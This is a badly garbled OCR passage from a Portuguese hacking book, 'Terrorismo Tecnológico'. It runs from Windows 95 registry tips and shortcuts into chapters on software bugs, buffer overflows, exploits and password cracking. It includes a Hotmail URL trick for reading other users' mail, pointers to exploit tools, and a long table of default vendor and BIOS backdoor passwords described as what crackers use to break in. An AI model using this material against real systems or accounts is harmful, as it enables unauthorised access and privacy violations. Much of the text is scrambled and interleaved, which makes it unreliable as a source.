ais de 6 meses para extrair o melhor desempenho do Windows 95. que estamos falando de placas gráficas, se você está pensando
ca ideade VRAM. Não se esqueça de v ficar se esta placa é compatível c
15.7.17 Atualizando de 4 Mb para 8 Mb de RAM
a isto é que o programa de instalação do Windows 95 instala diferentes arq m 4 Mb de RAM e
Mb de RAM;
ra não deletar um arquivo (ou grupo de arquivos acidentalmen ressionando Shift+Del você obtém o mesmo efei
a maioria são superiores aos drivers da Microsoft. Tambémque os fabrican
mJáem trocar a sua placa gráfica por outra, certamente você deverá fazer certas considerações como: pense em adquirir uma placa aceleradora gráfica, esta placa livra o trabalho daCPU além de aumentar a performance. Também pense em memória VRAM ao invês da DRAM, compre com no mínimo 2 Mb para sua placa gráfica, memória VRAM é mais cara mas também é muito mais rápida. A placa gráfi l seria aceleradora PCI com 2 Mb
eriom Plug & Play e está no Hardware Compability List da Microsoft.
Se você instalou o Windows 95 em um computador com 4 Mb de RAM e agoraatualizou seu sistema para 8 Mb de RAM, para tirar o máximo doWindows 95 é necessário re-instalar seu Windows 95. A razão par
uivos para computadores co8
15.7.18 Delete Arquivos Imediatamente Quando você pressiona a tecla SHIFT enquanto move arquivos para a lixeira, estes arquivos serão deletados imediatamente. Tenha cuidado ao utilizar esta opção pa
te. Pto.
Terrorismo Tecnológico Aprenda Para Sobreviver
281
Inicie o Windows 95 pelo diskete de sistema do mesmo, e digite: "A:\Unistall", isso pode ser feito também, iniciando o Windows 95 nor 5.
CD" e clique em Editar. Na lista de ções, selecione "Play" e clique em editar. gora, escreva na caixa de texto a linha de comando para chamar o
programa que voc Se você apagar or completo a linha, nada acontecerá quando você inserir um CD música no drive.
pastas e agora quer fechar todas, o modo ais fácil de fazê-lo é segurando Shift enquanto fecha a última
janela
15.7.19 Desinstalando o Windows 95
malmente, e executando o mesmo comando pelo Windows 9
15.7.20 Configurando o Autoplay para CDs de música Por padrão, o Windows 95 é configurado para começar o CD Player e tocar os CDs de música assim que inseridos no drive. Para mudar isso, vá no Windows Explorer, menu Exibir/Opções.../Tipos de Arquivos. Selecione "Audio aA
ê quer usar para tocar seus CDs.pde
15.7.21 Fechando várias pastas de uma só vez Se você abriu váriasm
(clicando no X no canto superior direito da janela.)
15.7.22 Abrindo o Prompt do MS-DOS em um diretório específico
Para abrir o Prompt do MS-DOS direto em um diretório que você
Terrorismo Tecnológico Aprenda Para Sobreviver
282
quiser, vá no Explorer, selecione o diretório, agora vá no menu Iniciar, Executar, digite Command e pressione OK.
15.7.23 Usand os no Prompt do MS-DOS
ar nomes de aruqivos longos em janelas DOS, basta e entre aspas. Exemplo: cd "Arquivos de Programas"
iciar o Windows para completar a is como fazê-lo sem ter que reiniar eqüência de boot: Clique no Menu
rá reiniciado!
5 Problema de Esvaziamento da Pilha (Memória Vazante)
, acusar falta de memória no sistema. Trata-se
e um problema do sistema operacional chamado vazamento de emória. Para corrigi-lo, instale o programa Kernel 32 Update.
15.7.26 Botão Iniciar
o nomes de arquivos long
Você pode uscolocar o nom
15.7.24 Reiniciando o Windows sem reiniciar todo o computador
uando você precisar rein
Qinstalação de algum programa, e computador e esperar toda a so
Iniciar, Desligar. Escolha Reiniar o Computador. Agora, mantenha a pressionada, enquanto clica no botão OK. Pronto, seu tecla Shift
indows seW
15.7.2
Quando você navega na Internet durante um periodo mais longoseu Windows 95pode dm
Terrorismo Tecnológico Aprenda Para Sobreviver
283
Aquele bo entro da arra! Clique Clique no botão e pressione as combinações de teclas lt + -". No menu que aparece, escolha a opção Mover. Agora use
tar o botão Iniciar. e truque só funciona se a opção Auto-ocultar da barra de
r desativada.
15.7.27 Propriedades
para obter rapidamente as propriedades de o clique nele enquanto você mantém
Se você, por algum motivo, escolh e
s lembrar-se que ma coisa, você pode mplesmente digitar 'WIN' quando a tela "Seu computador já pode
cer. Se quiser ir para o prompt CO80'. Isso acontece porque o
la gráfica, mas, na verdade, ele está em .
m impressos sem abrir o pro ama que os criou. Para executar essa tarefa, ser selecione os obje ados, clique neles com o botão direito do mouse e escolha Imprimir. Obs: Isso só funciona com aplicativos de 32 bits.
tão pode ser colocado em qualquer posição db"Aas teclas com setas de direção para movimen Esstarefas estive
No Windows 95, qualquer arquivo, dê um duplprecionada a tecla Alt.
15.7.28 Evitando ter que reiniciar o computador
er para desligar o computador precisa fazer mais algudepoi
siser desligado com segurança" apare
o DOS, simplesmente digite'MODEdWindows apresenta uma tem normal Prompt do DOSu
15.7.29 Impressão Rápida No Windows 95, arquivos registrados no sistema (DOC, BMP etc...) pode gr
tos desej
Terrorismo Tecnológico Aprenda Para Sobreviver
284
15.7.30 Renomeando a Lixeira do Windows 95 Abra o Registro, executando o arquivo Regedit.exe. No menu Editar, selecione a opção Localizar, na tela que surge, digite a palavra Lix o Win95 ncontrar o texto, aparecerá, na parte direita da tela, o seguinte: adrão) "Lixeira". Dê um duplo clique nessa opção. Agora é só
a a designação que você achar mais erá efeito depois que você reiniciar o
15.7.31 Teclas de Atalho F2 Renomear
3 Localizar
ar ou Colar
vo na
erbos alternativos no menu contextual
eira e espere alguns segundos. Quandoe(Prenomear a Lixeira par adequada. A mudança só tWindows 95.
F CTRL+X,C,V Recortar, Copi SHIFT+DELETE Excluir imediatamente sem colocar o arqui Lixeira. ALT+ENTER Propriedades ALT+clique duplo Propriedades CTRL+clique direito Colocar v Abrir com SHIFT+ clique duplo Explorar o objeto se houver um comando Explorar
Terrorismo Tecnológico Aprenda Para Sobreviver
285
CTRL+arrastar um arquivo até uma pasta Copiar um arquivo CTRL+SHIFT+arrastar um arquivo até a área de trabalho ou uma pasta Criar um atalho
TAB, SHIFT+F10 Abrir propriedades da barra de refas
4 (Explorer) Exibe a caixa de combinação
5 Atualiza
CTRL+G (Windows Explorer) Ir para CTRL+Z Desfazer
TRL+A Selecionar tudo
ACKSPACE Vai para a pasta pai
HIFT+<fechar> Fecha esta pasta e todas as suas pastas pais
indows Explorer
CTRL+ESC,ESC,ta
Controle geral sobre pastas/Windows Explorer F F F6 Alterna entre painéis no Explorer
C B S
No W
um* Expande tudo sob a seleção
N
Terrorismo Tecnológico Aprenda Para Sobreviver
286
Num- Expande a seleção Num+ ou Seta à direita Reduz a seleção Seta à direita Expande a seleção atual, se estiver reduzida; caso
ntrário, vai para a primeira pasta filha Seta à esquerda Reduz a eleção atual, se estiver expandida; caso contrário, vai para a pasta
i
cospa
Em Propriedades
CTRL+TAB/CTRL+SHIFT+TAB Alterna entre guias Propriedades
Nas caixas de diálogo normais Abrir/Salvar
4 Abre a lista de locais
F F5 Atualiza a tela Backspace Vai para a pasta pai se o foco estiver na janela de visualização
Comandos gerais apenas de teclado F1 Ajuda F10 Modo Vai para Menu SHIFT+F10 Menu contextual para o item selecionado
Terrorismo Tecnológico Aprenda Para Sobreviver
287
CTRL+ESC Acessa o menu Iniciar CTRL+ESC, ESC Foco no botão "Iniciar" SHIFT+F10 Menu contextual ALT+TAB Alternar para o programa em execução SHIFT enquanto insere o CD Ignora auto-execução Alt+M quando o foco está na barra de tarefas Minimiza todas as janelas
Teclas de acessibilidade
Teclado MS Natural Keyboard
Tocar SHIFT 5 vezes Liga/desliga Teclas de Aderência Manter pressionada SHIFT Direita por8 segundos Liga/desliga Teclas de Filtragem Manter pressionada NumLock por 5 segundos Liga/desliga Teclas de Alternação ALT Esq+SHIFT Esq +NumLock Liga/desliga Teclas do Mouse ALT Esq+SHIFT Esq+PrintScreen Liga/desliga AltoContraste
Win+R Caixa de diálogo Executar
Terrorismo Tecnológico Aprenda Para Sobreviver
288
Win+M Minimizar Tudo SHIFT-Win+M Desfazer Minimizar Tudo Win+F1 Ajuda do Windows Win+E Explorer Win+F Localizar Arquivos ou Pastas C
in+Tab Alternar entre os botões da barra de tarefas
Copie com outro nome o arquivo USER.EXE que se encontra no diretório "C:\Windows\System" e abra o mesmo num editor de Ícones depois opie o arquivo modificado para o mesmo diretorio. OBS: Faça ackup do arquivo entes de apagá-lo.
TRL+Win+F Localizar Computador
W Win+Break Tecla aceleradora de PSS... (propriedades de Sistema) Evitando que os últimos arquivos abertos sejam mostrados no menu Documentos Normalmente, não há como fazer isso, mas há um meio que resolve o problema: Primeiro, saia para o modo MS-DOS. Normalmente, os documentos são guardados na pasta \WINDOWS\RECENT. No DOS, apague a pasta RECENT. Por último, crie no diretório \WINDOWS um arquivo chamado RECENT, pois tendo um arquivo com o mesmo nome no mesmo diretório o Windows não poderá recriar a pasta assim que for iniciado.
15.7.32 Mudando o Ícone do MENU INICIAR
qualquer, e mude os ícones (de todos os tamanhos), cb
Terrorismo Tecnológico Aprenda Para Sobreviver
289
15.7.33 Um menu iniciar ideal
Comece tirando proveito de algumas configurações rápidas para personalizar o menu iniciar- não é necessária nenhuma edição do registro para este truque. Primeiro, inclua as pastas painel de controle, impressoras, rede dial-up, e lixeira no menu inicar. Para incluir esses itens vc precisa manipular os indentificadores de classe( ou CLSIDs), longas sequencias de números e letras que indentificam cada item do registro. O CLSDI do painel de controle é {21ec2020-3aea-1069-a2dd-08002b30309d}; da pasta de impressoras é {2227a280-3aea-1069-a2de-08002b30309d}; do acesso à rede dial up é {992cffa0-f557-101a-88ec-00dd010ccc48} e da lixeira é {645ff040-5081-101b-9f08-00aa002f954e}. Para incluir o painel de controle no menu iniciar faça o seguinte: Abra o windows explorer, e crie uma nova pasta no diretório windows\menu iniciar chamada Painel de Controle rápido.{21ec2020-3aea-1069-a2dd-08002b30309d} exatamente como está aqui, somente o nome antes do ponto pode ser trocado, o resto NÂO! Para vc fazer com os outros, siga os mesmos passos, mais com o número dele.
15.7.34 Explorer no meu computador! Dê um clique duplo no ícone Meu Computador para exibir as unidades de seu PC, impressoras e painel de controle. Não seria agradável se vc desse um clique duplo em meu computador e aparecesse algo útil como o explorer do windows? É fácil fazer isso: Primeiro clique em iniciar/executar e digite isso: regedit ; Depois de ter entrado nele, no lado esquerdo, expanda essas janelas: HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\SHELL. De um clique com o botão dieito e escolha
Terrorismo Tecnológico Aprenda Para Sobreviver
290
novo " chave, Digite open e presione enter. Dê um clique com o botão direito em open e escolha novo " chave. Digite command e presione enter. Dê um duplo clique em (padrão), digite: explorer /e,c:\windows e pressione enter! Lembrando que a pastinha meu computador, vai parar de funcionar, até vc remover o negócio da pasta!
15.7.35 Visualizar arquivos
Rápido! encontre aquele imagem para a apresentação!!! Não consegue lembrar o nome do arquivo? Eis uma ajuda que pode ajudar a acha-lo. Abra o registro para mudar o ícone padrão dos arq BMP para uma visualização instantãnea do conteúdo ( como acontece em sistemas macintosh). Localize essa chave: HKEY_CLASSES_ROOT/PAINT.PICTURE\DEFAULTICON. Altere o v r padrao para %1. Inicie o explorer e vc verá todas as imagens .BMP aparecerem em pequenininho!
1 7.36 Como trocar os ícones do Meu Computador e Lixeira?
Para alterar o ícone do meu computador faça o seguinte: abra o registro e localize essa chave: HKEY_CLASSES_ROOT\CLSID\{200D04FE0-3AEA-1069-A2D8-08002B30309D}\DEFAULTICON. De um duplo clique em (padrão) e coloque o ícone que deseja expecificando onde está o icone de da lixeira é um pouco mais com gistro tem 3 valores : (padrão), empty e full. Quando a lixeira está vazia, o ícone empty (vazio) é armazenado no (padrão), e qundo tá cheio o ícone full (cheio) tambem é armasenado no (padrão), então tende-se certificar de que ambos estejam corretos. Vou mostrar uma foto com minha lizeira vazia e mostrar. Para trocar o ícone, esvazie sua lixeira, e entre no regitro, depois vá até aqui :HKEY_CLASSES_ROOT\CLSID
uivos .
alo
5.
sejado. Para trocar o íconeplicado, porque dentro do re
Terrorismo Tecnológico Aprenda Para Sobreviver
291
{645FF040-5081-101B-9F08-00AA002F954E}\DEFAULTICON. Depois vc coloca o caminho dos ícones vazis, no (padrão) e no empty, depois o ícone cheio no valor full e pronto, depois vc tem de reiniciar!
15.7.37 As pessoas podem ler meu e-mail?
Sim, podem. Agora, isso não significa que há sempre alguém lendo a sua correspondência. Com milhões de pessoas na Internet, as novas mensagens individuais se perdem na multidão. Mas como voc sabe, quando uma mensagem parte do seu sistema, ela pode chegar a um outro computador localizado a centenas e até milhares de quilômetros de distancia, e você não tem como saber quem tem acesso a ela. Mesmo que ninguém leia a sua correspondência enquanto esta estiver em trânsito, o destinatário poderá encaminhá-la a quem bem desejar. Mas nem tudo está perdido - existem maneiras de tornar o seu e-mail mais seguro. Uma delas consiste em criptografar a sua mensagem antes de enviá-la. Criptografar significa simplesmente transformá-la em uma seqüência de códigos que só podem ser decifrados com a chave apropriada. Ao ser recebida, a mensagem deverá ser descriptografada no equipamento destinatário. Enviar mensagens pelo Netscape 2.02 e Internet Explorer 2 é relativamente seguro. Não sou hacker! Sou somente uma pessoa que adora computadores há muito tempo e com a Internet teve a chance de disponibilizar informações sobre informática para outras pessoas e assim haver a troca de informações. Também sou absolutamente contra a pirataria, ou seja a cópia de programas. Legalize sua cópia pirata! Também não existe nenhum livro ou material específico em como ser tornar um hacker. Não existe uma fórmula mágica e nem como se tornar um hacker do dia para a noite. Um hacker se faz após anos de muita leitura e estudo. Basicamente toda a informação que você necessita para se tornar um hacker já está disponível na rede, o que você tem que fazer é vasculhar e Está certo que isto não é uma tarefa muito fácil, mas quem disse que ser um hacker é
ê
achar as informações.
Terrorismo Tecnológico Aprenda Para Sobreviver
292
fácil? Qualquer um pode ser um hacker ou médico ou engenheiro ou etc
. Desde que você se informe e estude.
Terrorismo Tecnológico Aprenda Para Sobreviver
294
16.1 Introdução
ordem. Essas falhas por mais insignificantes que possa parecer podem comprometer a segurança de uma rede inteira.
O grande perigo é em consciência e não faz as atualizações que são tão necessárias.
a, surge a partir do momento que o programador comete um erro. Por serem pequenos erros estes passam despercebidos e só são descobertos por algum hacker ou analista de segurança.
O falhas descobertas são feitas pelos próprios usuários do sistema op
Surge então aquele irritante aviso que o programa fez uma
Todos os sistemas possuem falhas sendo S.O., aplicativos, banco de dados...
Elas consistem em pequenos erros na criação e compilação dos programas, possibilitando que crackers os utilizem para tomar o controle de alguma máquina ou pelo menos causar uma des
o administrador que não t
16.2 Como surge o bug A máquina não erra e sim o homem. O bug, ou falh
s erros do Windows, por exemplo. As grandes maiorias das
eracional. Os criadores mesmo que têm o código fonte e conhecem o programa como a palma da mão raríssimas vezes percebem algum erro. Para ser mais seguro, um programa têm que ser testado de todas as maneiras possíveis. Coisa que não fazem mais hoje, pois o custo aumenta e as empresas querem lançar logo o software no mercado.
operação ilegal
Terrorismo Tecnológico Aprenda Para Sobreviver
295
16.3 Exemplos de falhas
acas. Se alguém tentar o primeiro m já con
tbios ativo em sua instalação. Sa
Erros de Active X possibilitam que ao visitar um site, o Internet
Explorer instale um programa no seu computador e o execute sem que você perceba. Preocupa-se em não abrir anexos de e-mail? Erros no Outlook fazem ceber os e-mails os anexos sejam executados automaticamente. No Outlook XP
algo urgente e ele
?
r e sim pra qualquer usuário. O Int t,
consiga possui
sendmail provavelmente o maior bu o
e aperte enter. Você entendeu algo do
O Windows 98 possui muitos erros e poe muitos nisso, mas três
são interessantes. O primeiro é que não consegue executar nem abrir nenhum link com a url c:\con\con . Se você tentar ir a iniciar e executar, o sistema travará e mostrará a famosa tela azul. Os outros dois são do netbios. O primeiro possibilita que você acesse o diretório system do Windows por um compartilhamento de impressora. É só mapear o compartilhamento padrão printer$. O último possibilita que se descubra a senha do netbios sabendo apenas o primeiro caractere. Por exemplo: coloco no disco C compartilhado a senha m
segue acesso à minha rede. O Windows 2000 também possui algumas falhas, como deixar o ne
indo um pouco dos sistemas operacionais, alguns programas também possuem falhas graves.
com que só de re
tentaram resolver este problema bloqueando a maioria dos anexosrecebidos, resultado você recebe um e-mail comfica bloqueado e você perde seus anexos, que inteligente não éAté existe formas de desbloquear, mas deveria ser mais fácil e nãocoisa apenas para um admistrado
ernet Information Server, servidor de homepages da Microsofpossui erros graves. Unicode, RDS, existem muitos. Um mais recente é uma falha no printer.isapi, fazendo com que se acesso ao Windows 2000 pelo IIS 5.0 . O sistema Unixmuitas falhas também, como no
g de todos e no Apache, mas é mais fácil exemplificar usandomaravilhoso sistema de Bill Gates. Um truquezinho: abra o Word, digite a função =rand(100,100)
aparece no Word após dar enter?
Terrorismo Tecnológico Aprenda Para Sobreviver
296
16.4 Buffer overflows O buffer overflow é um ataque usado há muito tempo e que ainda
será muito usado. Compreende em lotar os buffers (memória disponível para aplicativos incluir na sua lista de processos algum programa tal como um keylogger ou um trojan. To s os sistemas são vulneráveis a buffer overflows e a solução é a m
ue mais teve problemas de race condition até hoje é o sendmail , serviço de e-mail padrão do Unix. É possível encontrar falha entes.
lhas
ecam por erros de buffer overflow e outros, mas isso é coisa para um bom programador, já
e seria isitar páginas especializadas no assunto, que o cada dia publicam ovos tipos de erros descobertos. Algumas muito boas são a ecurity-focus (www.security-focus.com
) de um servidor e
doesma, procurar se já existem correções existentes. Novo buffer
overflows surge todo dia, até o XP já têm alguns.
16.5 Race condition O Race condition ou condição de corrida é mais comum no Unix
e no Linux. Consiste em fazer algum programa que rode como root (superusuário) executar alguma falha que possa lhe enviar para o shell do sistema. O programa q
s até em versões mais rec
16.6 Descobrindo se alguns sistemas têm fa Utilizando recursos de debug que ch
para o usuário é bem mais difícil descobrir algo. O interessantvnS ) em inglês.
Terrorismo Tecnológico Aprenda Para Sobreviver
297
16.7 Utilizando exploits
falhas. O exemplo
lgum computador, dor de comandos (ou shell).
ssim podendo fazer o que quiser com o sistema. Existe também o shack (sem o 2000), que utiliza um erro de buffer overflow do IIS .0 para fazer com que possa mandar o servidor executar qualquer
nde a uma falha, por so geralmente os grandes sites de segurança publicam os dois
ompiladores para rodar os exploits em ww.programmersheaven.com.
Exploit que checa mais de 200 vulnerabilidades de Unicode (IIS),
16.8 No Linux
linux também tem muitos erros, só no primeiro trimestre de 2003
ma falha na biblioteca para compressão de software utilizada em ncipal do sistema
uscetível a ataques de hackers. O bug, conhecido como buffer overflow (sobrecarregamento de
buffer), leva as funções principais do gerenciamento de memória no zlib a falharem e, nesta condição, permite que pessoas com conhecimento técnico aperfeiçoado assumam o controle de computadores Linux via Internet.
vulnerabilidade afeta qualquer versão do Linux que utilize a biblioteca zlib para descompressão, incluindo o software principal do sistema operacional - o kernel.
Exploits são programas criados para explorar
do printer .isapi do IIS 5.0, possui um exploit chamado iishack2000. Possibilita que somente digitando o IP de aconsiga acesso direto ao interpretaAii4tarefa (como um trojan). Cada exploit correspoisjuntos. Geralmente vêm em código-fonte C, Perl e alguns poucosem executáveis comuns.
Dicas: Cw
no site: http://tomktech.n3.net.
Oforam descobertos mais de 500 bugs diferentes. Utodas as versões do Linux pode deixar a parte pris
A
Terrorismo Tecnológico Aprenda Para Sobreviver
298
Segundo sites especializados, pa, vnc, Mozilla e muitos outros pro
cotes incluindo X11, rsync, QT, gcc gramas que têm a capacidade de utilizar o método de compressão estão potencialmente vul eráveis.
16.9 Correção
Depois de perceberem erros, alguns S.O. como o XP envia a Microsoft como ocorreu o erro, assim os programadores podem fazer correções e essas são distribuídas. São os famosos patches ou Service Pack. Toda vez que um erro for descoberto deve-se visitar a página do fabricante do programa e pegar a correção. Isso não pode ser feito a cada determinados tempos como 6 meses ou a cada dois meses, mas é no máximo uma em uma semana.
Microsoft (www.microsoft.com.br) , a Securenet (www.securenet.com.br) e a Anti-Hackers homepage (www.hackers.com.br) possuem algumas listas e grupos de informações a respeito dos bugs.
16.10 Outros Bugs
Os bugs como são erros de linguagem podem também ocorrer com paginas da Internet vejamos um encontrado no Hotmail:
aça como teste em outra caixa de mensagens sua já que é ilegal ler mensagens de outras pessoas!
Entre no hotmail e log-se normalmente com seu ID e SENHA
n
A
** F
Terrorismo Tecnológico Aprenda Para Sobreviver
299
Para ler menssagens de o http://pv2fd.pav2.hotmail.msn.com/cgi-bin
&domain=hotmail.com
utra caixa use o link.
/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e3 6%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d9702%26len%3d96 87%26raw%3d0%26disk%3d64%2e4%2e36%2e68_d1577%26login%3dusername%26domain%3dhotmail%2ecom& hm___fl=attrd
Pare este ler mude os seguintes textos do url : M 22803%2e16 (Número ID da menssagem simplesmente conte como %2e=.) username (O usuário que você queira ler a menssagem) Se você quiser ler e-mails como "e-mailbox view"ao invés de visão
SG9433
completa. remova = "%26raw%3d0"
Se você não gosta do frame do hotmail em cima. remova "&hm___fl=attrd&domain=hotmail.com"
Terrorismo Tecnológico Aprenda Para Sobreviver
301
17.1 Wordlists São listas com usuários e senhas. Quando se têm arquivos de
a d m stema de cripto DES a criptografia é inquebrável, porém programas como Cracker Jack pegam um
vo r ” lis ptografa nd e ma senhas Unix (D S) e compara
quiSe o programa encontrar algum usuário em que a criptografia
fi xa igua so é qu n nciona o nome lhe é in coloca mente, uma em
linarrato34
55479
.2 O processo de bruteforce
método da rç r o melhor de toas, e às vezes dias para conseguir uma resposta.
tiliza-se m r ma nta conectar-se a um sistema ndo toda as c inações possíveis de letras e números. Ele isso. Digamos que você peça para ele combinar os números ,3,4,5,6,7,8,9 ele fará as c ações possíveis ate ntrar a se ha M que possui uma conexão de 56
e um ium III, ou até um Pentium IV é muito icado que consiga descobrir a senha. Para se ter alguma
ance deve-se utilizar uma conexão dedicada (à cabo, via rádio e ) s comp es, por exemplo, em uma universidade te tos c ador numa sala e com uma Internet bem T 0 co ore ápidos tr a ada um em um
senh o UNIX co o si grafia
arqui criado “wo dlists tas de senhas comuns o criutiliza o o m smo siste das de Eos ar vos.
tenha cado eformado. As palavras são ha.
tamente l, is e a sedas vertical
ha fu
cadaC o M 12
...
17 O fo a bruta deve se dos. Mas pode
levar hor U u p ogra que te
utiliza s ombgera 0,1,2 todas ombinenco n . as um crackerkbps complch
utiliza Pent
outras e vário utadoronde m mui omput es veloz. endo 2 mputad s r abalh ndo c
Terrorismo Tecnológico Aprenda Para Sobreviver
302
seb, o o
tor (um tentando descobrir senhas começadas por a, o outro por utro por c,...) o tempo para se conseguir a senha diminuirá
de e . lo t c que po é b ais ráp do.
a o C ha Scan, tus NAT (Netbios itin ) são os melhor
17.3 Tabela completa
ora rei u bem rande e e A ALGUMA deve checá-la para ver se o seu
ema lner v so e er troqu s o mais rápido o ssív ara s r pa oteadores e outros dispositivos que pos enha ior nte já mo m la com as
principais senhas, mas eram as principais, aqui está à tabela completa, que os cracker utilizam para invadir e roubar as informações
reta o ro e end ssim nunca pegos pelos agentes de anç uidado e )
consi ravelm nte Já calmen e é laro o tem em m i O plicativ AIN, S dow Bru e
Aud g Tool es!
Ag mostra ma lista g la DE FORM
deve ser deixada de lado. Pois se sist está vu á el, ca stiv e esta enha
po el. É p e usada ra rsuam s s. (anter me strei u a tabe
di mente d t ador, s o asegur a c ntão!
anFabricte
toProdu Revisão
Protocolo Usuário Senha Nível de
acesso 3COM CellPlex 700
0 Telnet tech tech
3COM CoreBuilder 0/6
00
Telnet debug 700
000/3500/25
synnet
Terrorismo Tecnológico Aprenda Para Sobreviver
303
3COM CoreBuild 700
/
Telnet tech er 0/6
000/35002500
tech
3COM C Telnet adm (none) HiPerAR v4.1.x
3COM LANplex 250 Telnet debug synnet 0
3COM LANplex Telnet tech tech 2500
3COM LinkSwitch
2000/2700
Telnet tech tech
3COM
5x0 Telnet ORD
Office Connect ISDNRouters
n/a PASSW Admin
3COM NetBuilder O SNMP n/a ANYCM
3COM
2200
Telnet debug synnet SuperStack II Switch
3COM SuperStac 2700
Telnet tech tech k II Switch
3COM SuperStack II Switch
1100/3300
Telnet monitor monitor Monitor
3COM SuperStack II Switch
1100/3300
ager Telnet man manager
Manager
3COM SuperStack II Switch
1100/3300
n Telnet admi (none) Admin
3COM SuperStack II Switch
1100/3300
ity Telnet secur security Admin
3COM Telnet adm (none)
3COM Telnet admin net syn
3COM ager e Telnet man managr
3COM tor Telnet moni monitor
3COM Telnet read synnet
3COM Telnet security rity secu
3COM Telnet write synnet
Accelerated Networks
DSL CPE and DSLAM
Telnet sysadm t anicus
ADC Kentrox
Pacesetter Router
Telnet n/a secret
Adtran MX2800 Telnet n/a adtran
Advance PC BIOS Console n/a Advanc Admin
Terrorismo Tecnológico Aprenda Para Sobreviver
304
d Integration
e
Alteon ACEswitch
180e
n HTTP admi admin Admin
Alteon ACEswitch
180e
n Telnet admi (none)
AMI PC BIOS Console n/a AM Admin
AMI PC BIOS Console n/a AMI Admin
AMI PC BIOS Console n/a A.M.I Admin
AMI PC BIOS Console n/a AMI_W
S Admin
AMI PC BIOS Console n/a AMI?SW
Admin
AMI PC BIOS Console n/a aammii Admin
AMI PC BIOS Console n/a AMI!SW Admin
AMI PC BIOS Console n/a AMI.KEY
Admin
AMI PC BIOS Console n/a AMI.KEZ
Admin
AMI PC BIOS Console n/a AMI~ Admin
AMI PC BIOS Console n/a I Admin AMIAM
AMI PC BIOS Console n/a AMIDECOD
Admin
AMI PC BIOS Console n/a AMIPSWD
Admin
AMI PC BIOS Console n/a amipswd
Admin
AMI PC BIOS Console n/a AMISETUP
Admin
AMI PC BIOS Console n/a BIOSPASS
Admin
AMI PC BIOS Console n/a CMOSPWD
Admin
AMI PC BIOS Console TD
n/a HEWIT RAN
Admin
Amptron PC BIOS Console n/a Polrty Admin
Apache Project script
OCKS
Apache "jj"
HTTP n/a SDGR User
APC MasterSwi9210
apc apc Admin tch
AP
APC SNMP
2.x apc apc Adapter
APC Call-UPS AP9608
Console n/a serial number of the Call-UPS
Admin
APC Share-UPS
AP9207
Console n/a serial number of the Share-
Admin
Terrorismo Tecnológico Aprenda Para Sobreviver
305
UPS
APC Web/SNMP Management Card
AP9606
Multi apc apc Admin
APC Powerchute Plus
4.x for Netware 3.x/4.x
Console POWERCHUTE
APC Admin
Ascend Router Telnet n/a ascend Admin
AST PC BIOS Console n/a SnuFG5 Admin
Attachmate
Attachmate Gateway
Console n/a PASSWORD
Admin
AT&T 3B2 Firmware
Console n/a mcp Admin
Audioactive
MPEG Realtime Encoders
Telnet n/a telos Admin
Autodesk
Autocad Multi autocad autocad User
AWARD PC BIOS Console n/a Award Admin
AWARD PC BIOS Console n/a AWARD_SW
Admin
AWARD PC BIOS Console n/a SW_AWARD
Admin
AWARD PC BIOS Console n/a lkwpeter Admin
AWARD PC BIOS Console n/a LKWPETER
Admin
AWARD PC BIOS Console n/a ?award Admin
AWARD PC BIOS Console n/a 256256 Admin
AWARD PC BIOS Console n/a admin Admin
AWARD PC BIOS Console n/a alfarome
Admin
AWARD PC BIOS Console n/a aLLy Admin
AWARD PC BIOS Console n/a aPAf Admin
AWARD PC BIOS Console n/a award Admin
AWARD PC BIOS Console n/a AWARD SW
Admin
AWARD PC BIOS Console n/a awkward
Admin
AWARD PC BIOS Console n/a BIOS Admin
AWARD PC BIOS Console n/a biosstar Admin
AWARD PC BIOS Console n/a biostar Admin
AWARD PC BIOS Console n/a CONCAT
Admin
AWARD PC BIOS Console n/a condo Admin
Terrorismo Tecnológico Aprenda Para Sobreviver
306
AWARD PC BIOS Console n/a CONDO Admin
AWARD PC BIOS Console n/a CONDO,
Admin
AWARD PC BIOS Console n/a HELGA-S
Admin
AWARD PC BIOS Console n/a HEWITT RAND
Admin
AWARD PC BIOS Console n/a HLT Admin
AWARD PC BIOS Console n/a j322 Admin
AWARD PC BIOS Console n/a j64 Admin
AWARD PC BIOS Console n/a lkw peter
Admin
AWARD PC BIOS Console n/a lkwpeter Admin
AWARD PC BIOS Console n/a PASSWORD
Admin
AWARD PC BIOS Console n/a SER Admin
AWARD PC BIOS Console n/a setup Admin
AWARD PC BIOS Console n/a SKY_FOX
Admin
AWARD PC BIOS Console n/a SWITCHES_SW
Admin
AWARD PC BIOS Console n/a Sxyz Admin
AWARD PC BIOS Console n/a SZYX Admin
AWARD PC BIOS Console n/a t0ch20x Admin
AWARD PC BIOS Console n/a t0ch88 Admin
AWARD PC BIOS Console n/a TTPTHA
Admin
AWARD PC BIOS Console n/a TzqF Admin
AWARD PC BIOS Console n/a wodj Admin
AWARD PC BIOS Console n/a zbaaaca
Admin
Axis NETCAM 200/240
Telnet root pass Admin
Axis Printserver
540/540+
Multi root pass Admin
Bay Networks
Router Telnet Manager (none) Admin
Bay Networks
Router Telnet User (none) User
Bay Networks
SuperStack II
Telnet security security Admin
Bay Networks
Switch 350T
Telnet n/a NetICs Admin
Bintec Bianka Multi admin bintec Admin
Terrorismo Tecnológico Aprenda Para Sobreviver
307
Routers
Biostar PC BIOS Console n/a Biostar Admin
Biostar PC BIOS Console n/a Q54arwms
Admin
Breezecom
Breezecom Adapters
4.4.x
n/a Helpdesk
Admin
Breezecom
Breezecom Adapters
4.x n/a Super Admin
Breezecom
Breezecom Adapters
3.x n/a Master Admin
Breezecom
Breezecom Adapters
2.x n/a laflaf Admin
Cabletron
Netgear modem/router and SSR
netman (none) Admin
Cabletron
routers & switches
(none) (none)
Cayman Cayman DSL n/a (none) Admin
CGI World
Poll It v2.0
HTTP n/a protection
User/Admin over package
Cisco CiscoWorks 2000 admin cisco Admin
Cisco CiscoWorks 2000 guest (none) User
Cisco ConfigMaker cmaker cmaker Admin
Cisco IOS Multi cisco cisco
Cisco IOS Multi enable cisco
Cisco IOS 2600 séries
Multi n/a c
Cisco IOS Multi n/a cc
Cisco IOS Multi n/a cisco
Cisco IOS Multi n/a Cisco router
Cisco IOS SNMP public ReadOnly access
secret Read
Cisco IOS SNMP private ReadWrite access
secret Read/Write
Cisco IOS Multi ripeop (no pw)
Cisco PIX Telnet n/a cisco UID = pix
Cisco- Arrowpoint admin system Admin
Terrorismo Tecnológico Aprenda Para Sobreviver
308
Arrowpoint Compaq Insight Manager administrator administ
rator Admin
Compaq Insight Manager anonymous (none) User
Compaq Insight Manager operator operator
